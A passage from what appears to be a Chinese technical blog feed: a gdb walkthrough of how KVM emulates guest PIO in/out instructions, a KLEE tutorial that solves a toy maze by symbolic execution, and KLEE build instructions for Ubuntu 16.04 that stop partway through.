$9 = (struct kvm_run *) 0xffff88002a2a2000
(gdb) p vcpu->arch.pio_data
$10 = (void *) 0xffff88002a2a3000
(gdb)
</code></pre></div></div>
<p>这样,我们看到vcpu->run->io保存了一些PIO的基本信息,比如大小,端口号等,run后面的一个页
vcpu->arch.pio_data则保存了实际out出来的数据。让target继续执行,这个时候我们断回了kvmsample
程序中。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) p kvm->vcpus->kvm_run->io
$2 = {direction = 1 '\001', size = 2 '\002', port = 16, count = 1,
data_offset = 4096}
(gdb)
</code></pre></div></div>
<p>这里简单说一下kvm_run,这是用于vcpu和应用层的程序(典型如qemu)通信的一个结构,user
space的
程序通过KVM__VCPU_MMAP_SIZE这个ioctl得到大小得到大小,然后映射到用户空间。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) x /2b 0x7ffff7ff4000+0x1000
0x7ffff7ff5000: 10
</code></pre></div></div>
<p>我们通过gdb可以看到,我们在guest向端口写入的数据以及端口都能够从user
space读出来。在这个示例程序中,
仅仅是把数据输出来,qemu中会根据端口去寻找对应的设备,然后执行对应的回调。</p>
<p>整体而言,out指令的流程是非常简单的,guest写端口,陷入kvm, kvm回到user
space处理。</p>
<h2 id="3">三. PIO中in的处理流程</h2>
<p>虽然我们说guest访问端口包含了读写,都会导致vm
exit。但是如果我们细想一下会发现,out和in肯定是不一样
的。out只需要guest写一个数据就好了,但是in还需要读回来数据。所以流程应该是guest发起一个in操作,
然后kvm处理,返回到user
space之中,把数据填到kvm_run结构中,这样,kvm得到数据了再vm entry,这样
in的数据就能够到guest中了。</p>
<p>我们队实例程序做简单修改。在test.S中首先从0x10端口读入一个值,这个值为0xbeff,然后写到端口0x10。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test.S
# A test code for kvmsample
.globl _start
.code16
_start:
xorw %ax, %ax
mov $0x0a,%al
in $0x10,%ax
out %ax, $0x10
hlt
</code></pre></div></div>
<p>对main.c做如下修改:</p>
<p><img src="/assets/img/pio/5.png" alt="" /></p>
<p>在处理KVM_EXIT_IO的时候区分了一下in/out,对in我们拷贝一个0xbeff过去。然后用在guest中用out向
端口0x10输出这个值。</p>
<p>执行in指令的第一次仍然是陷入kvm handle_io处理,只是这次走另一条路:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 486 hit Breakpoint 1, handle_io (vcpu=0xffff88011d428000)
at arch/x86/kvm/vmx.c:4816
4816 {
(gdb) n
4821 exit_qualification = vmcs_readl(EXIT_QUALIFICATION);
(gdb)
4825 ++vcpu->stat.io_exits;
(gdb)
4827 if (string || in)
(gdb)
4828 return emulate_instruction(vcpu, 0) == EMULATE_DONE;
(gdb) s
emulate_instruction (emulation_type=<optimized out>, vcpu=<optimized out>)
at /home/test/linux-3.10.105/arch/x86/include/asm/kvm_host.h:811
811 return x86_emulate_instruction(vcpu, 0, emulation_type, NULL, 0);
(gdb) s
</code></pre></div></div>
<p>调用x86_emulate_instruction,这之中调用的最重要的两个函数时x86_decode_insn,
x86_emulate_insn。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int x86_emulate_instruction(struct kvm_vcpu *vcpu,
unsigned long cr2,
int emulation_type,
void *insn,
int insn_len)
{
int r;
struct x86_emulate_ctxt *ctxt = &vcpu->arch.emulate_ctxt;
bool writeback = true;
bool write_fault_to_spt = vcpu->arch.write_fault_to_shadow_pgtable;
/*
* Clear write_fault_to_shadow_pgtable here to ensure it is
* never reused.
*/
vcpu->arch.write_fault_to_shadow_pgtable = false;
kvm_clear_exception_queue(vcpu);
if (!(emulation_type & EMULTYPE_NO_DECODE)) {
init_emulate_ctxt(vcpu);
r = x86_decode_insn(ctxt, insn, insn_len);
}
restart:
r = x86_emulate_insn(ctxt);
if (ctxt->have_exception) {
inject_emulated_exception(vcpu);
r = EMULATE_DONE;
} else if (vcpu->arch.pio.count) {
if (!vcpu->arch.pio.in)
vcpu->arch.pio.count = 0;
else {
writeback = false;
vcpu->arch.complete_userspace_io = complete_emulated_pio;
}
r = EMULATE_DO_MMIO;
if (writeback) {
toggle_interruptibility(vcpu, ctxt->interruptibility);
kvm_set_rflags(vcpu, ctxt->eflags);
kvm_make_request(KVM_REQ_EVENT, vcpu);
vcpu->arch.emulate_regs_need_sync_to_vcpu = false;
kvm_rip_write(vcpu, ctxt->eip);
} else
vcpu->arch.emulate_regs_need_sync_to_vcpu = true;
return r;
}
EXPORT_SYMBOL_GPL(x86_emulate_instruction);
</code></pre></div></div>
<p>第一个函数,x86_decode_insn,顾名思义,就是解码当前的指令。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int x86_decode_insn(struct x86_emulate_ctxt *ctxt, void *insn, int insn_len)
{
/* Legacy prefixes. */
for (;;) {
switch (ctxt->b = insn_fetch(u8, ctxt)) {
}
/* Opcode byte(s). */
opcode = opcode_table[ctxt->b];
/* Two-byte opcode? */
if (ctxt->b == 0x0f) {
ctxt->twobyte = 1;
ctxt->b = insn_fetch(u8, ctxt);
opcode = twobyte_table[ctxt->b];
}
ctxt->d = opcode.flags;
ctxt->execute = opcode.u.execute;
ctxt->check_perm = opcode.check_perm;
ctxt->intercept = opcode.intercept;
rc = decode_operand(ctxt, &ctxt->src, (ctxt->d >> SrcShift) & OpMask);
if (rc != X86EMUL_CONTINUE)
goto done;
/*
* Decode and fetch the second source operand: register, memory
* or immediate.
*/
rc = decode_operand(ctxt, &ctxt->src2, (ctxt->d >> Src2Shift) & OpMask);
if (rc != X86EMUL_CONTINUE)
goto done;
/* Decode and fetch the destination operand: register or memory. */
rc = decode_operand(ctxt, &ctxt->dst, (ctxt->d >> DstShift) & OpMask);
}
</code></pre></div></div>
<p>首先通过insn_fetch获取指令,从下面的调试可以看到取到的指令正好是我们的in指令的机器码:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb)
4366 switch (ctxt->b = insn_fetch(u8, ctxt)) {
(gdb)
4414 if (ctxt->rex_prefix & 8)
(gdb) p ctxt->b
$38 = 229 '\345'
(gdb) p /x ctxt->b
$39 = 0xe5
</code></pre></div></div>
<p>之后根据指令,查表opcode_table找到对应的回调函数,将回调赋值给ctxt->execute.对于我们的in指令
来说这个回调是em_in函数。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4472 ctxt->execute = opcode.u.execute;
(gdb)
4473 ctxt->check_perm = opcode.check_perm;
(gdb) p ctxt->execute
$41 = (int (*)(struct x86_emulate_ctxt *)) 0xffffffff81027238 <em_in>
(gdb) n
</code></pre></div></div>
<p>接下来就是调用三次decode_operand取出对应指令的操作数了。从下面的调试结果我们看出,源操作数
的值为ctxt->src->val=16,需要写到的寄存器是RAX,即ctxt->dst->addr.reg</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) n
4528 rc = decode_operand(ctxt, &ctxt->src2, (ctxt->d >> Src2Shift) & OpMask);
(gdb) n
4529 if (rc != X86EMUL_CONTINUE)
(gdb) p ctxt->src->val
$42 = 16
(gdb) n
4533 rc = decode_operand(ctxt, &ctxt->dst, (ctxt->d >> DstShift) & OpMask);
(gdb) s
...
(gdb) p op->addr.reg
$46 = (unsigned long *) 0xffff88011d4296c8
(gdb) p ctxt->_regs[0]
$47 = 10
(gdb) p &ctxt->_regs[0]
$48 = (unsigned long *) 0xffff88011d4296c8
</code></pre></div></div>
<p>继续回到x86_emulate_instruction函数中,指令解码之后就是执行了,这是通过调用x86_emulate_insn
实现的。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int x86_emulate_insn(struct x86_emulate_ctxt *ctxt)
{
const struct x86_emulate_ops *ops = ctxt->ops;
int rc = X86EMUL_CONTINUE;
int saved_dst_type = ctxt->dst.type;
if (ctxt->execute) {
if (ctxt->d & Fastop) {
void (*fop)(struct fastop *) = (void *)ctxt->execute;
rc = fastop(ctxt, fop);
if (rc != X86EMUL_CONTINUE)
goto done;
goto writeback;
}
rc = ctxt->execute(ctxt);
if (rc != X86EMUL_CONTINUE)
goto done;
goto writeback;
}
writeback:
rc = writeback(ctxt);
if (rc != X86EMUL_CONTINUE)
goto done;
done:
if (rc == X86EMUL_PROPAGATE_FAULT)
ctxt->have_exception = true;
if (rc == X86EMUL_INTERCEPTED)
return EMULATION_INTERCEPTED;
if (rc == X86EMUL_CONTINUE)
writeback_registers(ctxt);
return (rc == X86EMUL_UNHANDLEABLE) ? EMULATION_FAILED : EMULATION_OK;
}
</code></pre></div></div>
<p>最重要的当然是调用回调函数了</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>rc = ctxt->execute(ctxt);
</code></pre></div></div>
<p>从之前的解码中,我们已经知道这是em_in了,相关调用函数如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int em_in(struct x86_emulate_ctxt *ctxt)
{
if (!pio_in_emulated(ctxt, ctxt->dst.bytes, ctxt->src.val,
&ctxt->dst.val))
return X86EMUL_IO_NEEDED;
return X86EMUL_CONTINUE;
}
static int pio_in_emulated(struct x86_emulate_ctxt *ctxt,
unsigned int size, unsigned short port,
void *dest)
{
struct read_cache *rc = &ctxt->io_read;
if (rc->pos == rc->end) { /* refill pio read ahead */
...
rc->pos = rc->end = 0;
if (!ctxt->ops->pio_in_emulated(ctxt, size, port, rc->data, n))
return 0;
rc->end = n * size;
}
if (ctxt->rep_prefix && !(ctxt->eflags & EFLG_DF)) {
ctxt->dst.data = rc->data + rc->pos;
ctxt->dst.type = OP_MEM_STR;
ctxt->dst.count = (rc->end - rc->pos) / size;
rc->pos = rc->end;
} else {
memcpy(dest, rc->data + rc->pos, size);
rc->pos += size;
}
return 1;
}
static int emulator_pio_in_emulated(struct x86_emulate_ctxt *ctxt,
int size, unsigned short port, void *val,
unsigned int count)
{
struct kvm_vcpu *vcpu = emul_to_vcpu(ctxt);
int ret;
if (vcpu->arch.pio.count)
goto data_avail;
ret = emulator_pio_in_out(vcpu, size, port, val, count, true);
if (ret) {
data_avail:
memcpy(val, vcpu->arch.pio_data, size * count);
vcpu->arch.pio.count = 0;
return 1;
}
return 0;
}
</code></pre></div></div>
<p>在最后一个函数中,由于vcpu->arch.pio.count此时还没有数据(需要user
spaces提供),所以会执行
emulator_pio_in_out,这在之前已经看过这个函数了,这就是设置kvm_run的相关数据,然后user
spaces来 填充。</p>
<p>执行完了x86_emulate_insn,流程再次回到x86_emulate_instruction,最重要的是设置
vcpu->arch.complete_userspace_io这样一个回调。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (ctxt->have_exception) {
inject_emulated_exception(vcpu);
r = EMULATE_DONE;
} else if (vcpu->arch.pio.count) {
if (!vcpu->arch.pio.in)
vcpu->arch.pio.count = 0;
else {
writeback = false;
vcpu->arch.complete_userspace_io = complete_emulated_pio;
}
</code></pre></div></div>
<p>之后这一次vm exit就算完事了。这样就会退到user space的ioctl KVM_RUN处。user
space发现是一个
KVM_EXIT_IO,并且方向是KVM_EXIT_IO_IN,于是向kvm_run填入数据0xbeff。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>case KVM_EXIT_IO:
printf("KVM_EXIT_IO\n");
if(kvm->vcpus->kvm_run->io.direction == KVM_EXIT_IO_OUT)
printf("out port: %d, data: 0x%x\n",
kvm->vcpus->kvm_run->io.port,
*(int *)((char *)(kvm->vcpus->kvm_run) + kvm->vcpus->kvm_run->io.data_offset)
);
else if(kvm->vcpus->kvm_run->io.direction == KVM_EXIT_IO_IN)
{
printf("in port: %d\n",kvm->vcpus->kvm_run->io.port);
*(short*)((char*)(kvm->vcpus->kvm_run)+kvm->vcpus->kvm_run->io.data_offset) = 0xbeff;
}
</code></pre></div></div>
<p>由于user
space的ioctl一般都是运行在一个循环中(如果不这样,guest也就不可能一直运行着了)。所以接着调用
KVM_RUN
ioctl。在进入non-root的模式前,有一个工作就是判断vcpu->arch.complete_userspace_io
是否设置,如果设置就会调用。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_arch_vcpu_ioctl_run(struct kvm_vcpu *vcpu, struct kvm_run *kvm_run)
{
int r;
sigset_t sigsaved;
if (unlikely(vcpu->arch.complete_userspace_io)) {
int (*cui)(struct kvm_vcpu *) = vcpu->arch.complete_userspace_io;
vcpu->arch.complete_userspace_io = NULL;
r = cui(vcpu);
if (r <= 0)
goto out;
} else
WARN_ON(vcpu->arch.pio.count || vcpu->mmio_needed);
r = __vcpu_run(vcpu);
return r;
}
</code></pre></div></div>
<p>从之前的分之知道</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vcpu->arch.complete_userspace_io = complete_emulated_pio;
</code></pre></div></div>
<p>看看相应的代码</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int complete_emulated_pio(struct kvm_vcpu *vcpu)
{
BUG_ON(!vcpu->arch.pio.count);
return complete_emulated_io(vcpu);
}
static inline int complete_emulated_io(struct kvm_vcpu *vcpu)
{
int r;
vcpu->srcu_idx = srcu_read_lock(&vcpu->kvm->srcu);
r = emulate_instruction(vcpu, EMULTYPE_NO_DECODE);
srcu_read_unlock(&vcpu->kvm->srcu, vcpu->srcu_idx);
if (r != EMULATE_DONE)
return 0;
return 1;
}
static inline int emulate_instruction(struct kvm_vcpu *vcpu,
int emulation_type)
{
return x86_emulate_instruction(vcpu, 0, emulation_type, NULL, 0);
}
</code></pre></div></div>
<p>最终也是调用了x86_emulate_instruction,值得注意的是用了参数EMULTYPE_NO_DECODE,这就不会再次
解码。而是直接执行我们之前的em_in函数。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int emulator_pio_in_emulated(struct x86_emulate_ctxt *ctxt,
int size, unsigned short port, void *val,
unsigned int count)
{
struct kvm_vcpu *vcpu = emul_to_vcpu(ctxt);
int ret;
if (vcpu->arch.pio.count)
goto data_avail;
ret = emulator_pio_in_out(vcpu, size, port, val, count, true);
if (ret) {
data_avail:
memcpy(val, vcpu->arch.pio_data, size * count);
vcpu->arch.pio.count = 0;
return 1;
}
return 0;
}
</code></pre></div></div>
<p>在最终的emulator_pio_in_emulated中,由于这个时候vcpu->arch.pio.count已经有值了,表示数据可用了。
最终会把数据拷贝到ctx->dst.val中。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) n
em_in (ctxt=0xffff88011d429550) at arch/x86/kvm/emulate.c:3440
3440 return X86EMUL_CONTINUE;
(gdb) n
3441 }
(gdb) p ctxt->dst.val
$58 = 48895
(gdb) p /x ctxt->dst.val
$59 = 0xbeff
(gdb) n
</code></pre></div></div>
<p>回到x86_emulate_insn,执行完了指令回调之后,会调到writeback函数去:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (ctxt->execute) {
if (ctxt->d & Fastop) {
void (*fop)(struct fastop *) = (void *)ctxt->execute;
rc = fastop(ctxt, fop);
if (rc != X86EMUL_CONTINUE)
goto done;
goto writeback;
}
writeback:
rc = writeback(ctxt);
if (rc != X86EMUL_CONTINUE)
goto done;
</code></pre></div></div>
<p>我们之前解码得到ctxt->dst.type是一个寄存器,所以会执行write_register_operand</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int writeback(struct x86_emulate_ctxt *ctxt)
{
int rc;
if (ctxt->d & NoWrite)
return X86EMUL_CONTINUE;
switch (ctxt->dst.type) {
case OP_REG:
write_register_operand(&ctxt->dst);
break;
return X86EMUL_CONTINUE;
}
static void write_register_operand(struct operand *op)
{
/* The 4-byte case *is* correct: in 64-bit mode we zero-extend. */
switch (op->bytes) {
case 1:
*(u8 *)op->addr.reg = (u8)op->val;
break;
case 2:
*(u16 *)op->addr.reg = (u16)op->val;
break;
case 4:
*op->addr.reg = (u32)op->val;
break; /* 64b: zero-extend */
case 8:
*op->addr.reg = op->val;
break;
}
}
</code></pre></div></div>
<p>最后一个函数op->addr.reg是解码过程中的目的操作数的寄存器,由之前知道是rax(&ctxt->_regs[0]),这样
就把数据(0xbeff)写到了寄存器了。但是这里是ctxt的寄存器,最后还需要写到vmcs中去,通过调用如下函数
实现</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (rc == X86EMUL_CONTINUE)
writeback_registers(ctxt);
static void writeback_registers(struct x86_emulate_ctxt *ctxt)
{
unsigned reg;
for_each_set_bit(reg, (ulong *)&ctxt->regs_dirty, 16)
ctxt->ops->write_gpr(ctxt, reg, ctxt->_regs[reg]);
}
static void emulator_write_gpr(struct x86_emulate_ctxt *ctxt, unsigned reg, ulong val)
{
kvm_register_write(emul_to_vcpu(ctxt), reg, val);
}
static inline void kvm_register_write(struct kvm_vcpu *vcpu,
enum kvm_reg reg,
unsigned long val)
{
vcpu->arch.regs[reg] = val;
__set_bit(reg, (unsigned long *)&vcpu->arch.regs_dirty);
__set_bit(reg, (unsigned long *)&vcpu->arch.regs_avail);
}
</code></pre></div></div>
<p>这样,接着进入guest状态的时候,guest得RAX就有了user
space传来的数据了。下面是一些调试数据。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) n
x86_emulate_insn (ctxt=0xffff88011d429550) at arch/x86/kvm/emulate.c:4828
4828 ctxt->dst.type = saved_dst_type;
(gdb) p ctxt->dst.val
$64 = 48895
(gdb) p &ctxt->dst.val
$65 = (unsigned long *) 0xffff88011d429640
(gdb) p &op->val
No symbol "op" in current context.
(gdb) n
4830 if ((ctxt->d & SrcMask) == SrcSI)
(gdb) p ctxt->dst.type
$66 = OP_REG
(gdb) n
[New Thread 2976]
4833 if ((ctxt->d & DstMask) == DstDI)
(gdb) n
[New Thread 2978]
[New Thread 2977]
4836 if (ctxt->rep_prefix && (ctxt->d & String)) {
(gdb) n
4866 ctxt->eip = ctxt->_eip;
(gdb) n
4875 writeback_registers(ctxt);
</code></pre></div></div>
<h2 id="4">四. 参考</h2>
<p>oenhan: <a href="http://oenhan.com/kvm-src-5-io-pio">KVM源代码分析5:IO虚拟化之PIO</a></p>
<p>Alex Xu: <a href="http://soulxu.github.io/blog/2014/08/11/use-kvm-api-write-emulator/">使用KVM API实现Emulator
Demo</a></p>
KLEE解决迷宫问题2017-06-09T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/06/09/klee-maze
<p>这是KLEE的第三篇tutorial,感觉还是挺有意思的,虽然简单还是记录一下,原文<a href="https://feliam.wordpress.com/2010/10/07/the-symbolic-maze/">在此</a>。</p>
<h2>问题描述</h2>
<p>问题也比较简单,给出一个路径,在下面的迷宫中从’X’走到’#’,a表示左,d表示右,w表示上,s表示下。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"+-+---+---+"
"|X| |#|"
"| | --+ | |"
"| | | | |"
"| +-- | | |"
"| | |"
"+-----+---+"
</code></pre></div></div>
<h2>传统方法</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// http://feliam.wordpress.com/2010/10/07/the-symbolic-maze/
// twitter.com/feliam
/*
* It's a maze!
* Use a,s,d,w to move "through" it.
*/
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
/**
* Maze hardcoded dimensions
*/
#define H 7
#define W 11
/**
* Tha maze map
*/
char maze[H][W] = { "+-+---+---+",
"| | |#|",
"| | --+ | |",
"| | | | |",
"| +-- | | |",
"| | |",
"+-----+---+" };
/**
* Draw the maze state in the screen!
*/
void draw ()
{
int i, j;
for (i = 0; i < H; i++)
{
for (j = 0; j < W; j++)
printf ("%c", maze[i][j]);
printf ("\n");
}
printf ("\n");
}
/**
* The main function
*/
int
main (int argc, char *argv[])
{
int x, y; //Player position
int ox, oy; //Old player position
int i = 0; //Iteration number
#define ITERS 28
char program[ITERS];
//Initial position
x = 1;
y = 1;
maze[y][x]='X';
//Print some info
printf ("Maze dimensions: %dx%d\n", W, H);
printf ("Player pos: %dx%d\n", x, y);
printf ("Iteration no. %d\n",i);
printf ("Program the player moves with a sequence of 'w', 's', 'a' and 'd'\n");
printf ("Try to reach the price(#)!\n");
//Draw the maze
draw ();
//Read the directions 'program' to execute...
read(0,program,ITERS);
//Iterate and run 'program'
while(i < ITERS)
{
//Save old player position
ox = x;
oy = y;
//Move polayer position depending on the actual command
switch (program[i])
{
case 'w':
y--;
break;
case 's':
y++;
break;
case 'a':
x--;
break;
case 'd':
x++;
break;
default:
printf("Wrong command!(only w,s,a,d accepted!)\n");
printf("You loose!\n");
exit(-1);
}
//If hit the price, You Win!!
if (maze[y][x] == '#')
{
printf ("You win!\n");
printf ("Your solution <%42s>\n",program);
exit (1);
}
//If something is wrong do not advance
if (maze[y][x] != ' '
&&
!((y == 2 && maze[y][x] == '|' && x > 0 && x < W)))
{
x = ox;
y = oy;
}
//Print new maze state and info...
printf ("Player pos: %dx%d\n", x, y);
printf ("Iteration no. %d. Action: %c. %s\n",i,program[i], ((ox==x && oy==y)?"Blocked!":""));
//If crashed to a wall! Exit, you loose
if (ox==x && oy==y){
printf("You loose\n");
exit(-2);
}
//put the player on the maze...
maze[y][x]='X';
//draw it
draw ();
//increment iteration
i++;
//me wait to human
sleep(1);
}
//You couldn't make it! You loose!
printf("You loose\n");
}
</code></pre></div></div>
<p>程序是很简单的,就是给一串输入,然后依次判断,最终给出win或者loose的输出。
可以通过观察看到一个解ssssddddwwaawwddddssssddwwww,当然也可以用回溯算法让程序找解。
这里我们主要看看用KLEE如何找解。</p>
<h2>KLEE求解</h2>
<p>KLEE的作用主要是将输入符号化,所以,首先首先将read调用改成klee_make_symbolic,这样就符号化
了program变量,当然需要包含头文件#include <klee\/klee.h>。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//read(0,program,ITERS);
klee_make_symbolic(program,ITERS,"program");
</code></pre></div></div>
<p>这样之后KLEE就会找出所有的路径,但是这样是不够的,因为我们只对win的路径感兴趣,
所以需要由一个flag来表示。我们可以在</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>printf ("You win!\n");
</code></pre></div></div>
<p>这个语句之后增加一个</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>klee_assert(0);
</code></pre></div></div>
<p>这样只要找到一个成功的路径,就会触发一个assert。开始执行。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ clang -I ../klee/include -emit-llvm -c maze.c
$ klee maze.bc
...
KLEE: done: total instructions = 127519
KLEE: done: completed paths = 309
KLEE: done: generated tests = 306
test@ubuntu:~/kleestudy$ ls klee-last/*.err
klee-last/test000135.assert.err
test@ubuntu:~/kleestudy$ ktest-tool klee-last/test000135.ktest
ktest file : 'klee-last/test000135.ktest'
args : ['maze.bc']
num objects: 1
object 0: name: 'program'
object 0: size: 28
object 0: data: 'sddwddddsddwssssssssssssssss'
</code></pre></div></div>
<p>我们看到输出一个解,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sddwddddsddwssssssssssssssss
</code></pre></div></div>
<p>直接用这个待入之前的第二节的程序,可以看到是正确的。这里我们注意到KLEE这里输出的解跟我们肉眼
的解是不一样的。确实是这样,大多数情况下,KLEE只会输出一个错误状态的路径。要输出所有这个
路径的所有输入,需要使用-emit-all-errors:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ klee -emit-all-errors maze.bc
test@ubuntu:~/kleestudy$ ls klee-last/*.err
klee-last/test000139.assert.err klee-last/test000238.assert.err
klee-last/test000220.assert.err klee-last/test000301.assert.err
</code></pre></div></div>
<p>我们看到输出了四个解。其实从运行的时候可以看出,y==2的时候穿墙了,代码里面也看得出来。</p>
Ubuntu 16.04安装KLEE2017-06-08T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/06/08/klee-newbie
<p>符号执行也算是阳春白雪了,不研究一下都不好意思说你是搞安全的。据说这也是大坑,到哪是哪。
本文主要记录Ubuntu 16.04下面安装KLEE的过程,使用的clang/llvm是3.9的。整体还是按照官网来的,一些容易出错的地方记录一下。</p>
<h3>1. 安装依赖库</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt-get install build-essential curl libcap-dev git cmake libncurses5-dev python-minimal python-pip unzip
</code></pre></div></div>
<h3>2. 安装LLVM 3.9</h3>
<p>这一步直接用安装packages就行,<a href="http://apt.llvm.org/">LLVM Package Repository</a>选
llvm3.9添加到/etc/apt/sources.list</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>deb http://apt.llvm.org/xenial/ llvm-toolchain-xenial-3.9 main
deb-src http://apt.llvm.org/xenial/ llvm-toolchain-xenial-3.9 main
</code></pre></div></div>
<p>添加repository key并下载llvm 3.9的packages</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ wget -O - http://llvm.org/apt/llvm-snapshot.gpg.key|sudo apt-key add -
$ sudo apt-get update
$ sudo apt-get install clang-3.9 llvm-3.9 llvm-3.9-dev llvm-3.9-tools
</code></pre></div></div>
<p>注意这个时候/usr/bin/clang-3.9是在PATH里面,为了使用clang以及其他不带3.9后缀的版本
,需要在~/.profile里面改一下PATH:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>export PATH="/usr/lib/llvm-3.9/bin:$PATH"
</code></pre></div></div>
<h3>3. 安装constraint solver</h3>
<p>KLEE支持几种约束求解器,这里我用的是<a href="https://github.com/z3prover/z3">Z3</a>,这个
按照官网编译就好。</p>
<h3>4. 编译uclibc and the POSIX environment model</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git clone https://github.com/klee/klee-uclibc.git
$ cd klee-uclibc
$ ./configure --make-llvm-lib
$ make -j2
</code></pre></div></div>
<h3>5. Get Google test sources</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ curl -OL https://github.com/google/googletest/archive/release-1.7.0.zip
$ unzip release-1.7.0.zip
</code></pre></div></div>
<h3>6. Install lit</h3>
<p>用sudo安装</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo pip install lit
</code></pre></div></div>
<h3>7. Install tcmalloc</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt-get install libtcmalloc-minimal4 libgoogle-perftools-dev
</code></pre></div></div>
<h3>8. 得到KLEE源码</h3>
<p>由于我们用的是llvm 3.9,直接用官方的KLEE会出现下列问题:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/home/test/klee/include/klee/Internal/Support/FloatEvaluation.h: In function ‘bool klee::floats::isNaN(uint64_t, unsigned int)’:
/home/test/klee/include/klee/Internal/Support/FloatEvaluation.h:135:25: error: ‘IsNAN’ is not a member of ‘llvm’
case FLT_BITS: return llvm::IsNAN( UInt64AsFloat(l) );
^
/home/test/klee/include/klee/Internal/Support/FloatEvaluation.h:136:25: error: ‘IsNAN’ is not a member of ‘llvm’
case DBL_BITS: return llvm::IsNAN( UInt64AsDouble(l) );
^
/home/test/klee/lib/Core/Executor.cpp: In member function ‘void klee::Executor::executeCall(klee::ExecutionState&, klee::KInstruction*, llvm::Function*, std::vector<klee::ref<klee::Expr> >&)’:
/home/test/klee/lib/Core/Executor.cpp:1403:21: error: ‘RoundUpToAlignment’ is not a member of ‘llvm’
size = llvm::RoundUpToAlignment(size, 16);
</code></pre></div></div>
<p>好在有人提供了一个llvm 3.9的<a href="https://github.com/klee/klee/pull/605/commits/5c4d9bc67e43e4a97391105dfc6a286215897fdb">pr</a>
我们直接clone这个人的repo。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test@ubuntu:~$ git clone https://github.com/jirislaby/klee.git
test@ubuntu:~$ cd klee
test@ubuntu:~/klee$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/better-paths
remotes/origin/errno
remotes/origin/llvm40_WallTimer
remotes/origin/llvm40_opt_end
remotes/origin/llvm40_static_casts
remotes/origin/llvm_37
remotes/origin/llvm_39
remotes/origin/master
test@ubuntu:~/klee$ git checkout remotes/origin/llvm_39
</code></pre></div></div>
<h3>9. 配置KLEE</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mkdir klee_build_dir
$ cd klee_build_dir
$ cmake -DENABLE_SOLVER_Z3=ON \
-DENABLE_POSIX_RUNTIME=ON \
-DENABLE_KLEE_UCLIBC=ON \
-DKLEE_UCLIBC_PATH=../klee-uclibc \
-DGTEST_SRC_DIR=../googletest-release-1.7.0 \
-DENABLE_SYSTEM_TESTS=ON \
-DENABLE_UNIT_TESTS=ON \
../klee
</code></pre></div></div>
<p>如果这一步出现找不到Doxygen,需要安装</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt-get install doxygen
</code></pre></div></div>
<p>如果出现ZLIB_LIBRARY (ADVANCED),需要自己下载zlib安装。</p>
<h3>10. 编译安装KLEE</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ make
$ sudo make install
</code></pre></div></div>
<p>这一步出现了一个错误:</p>
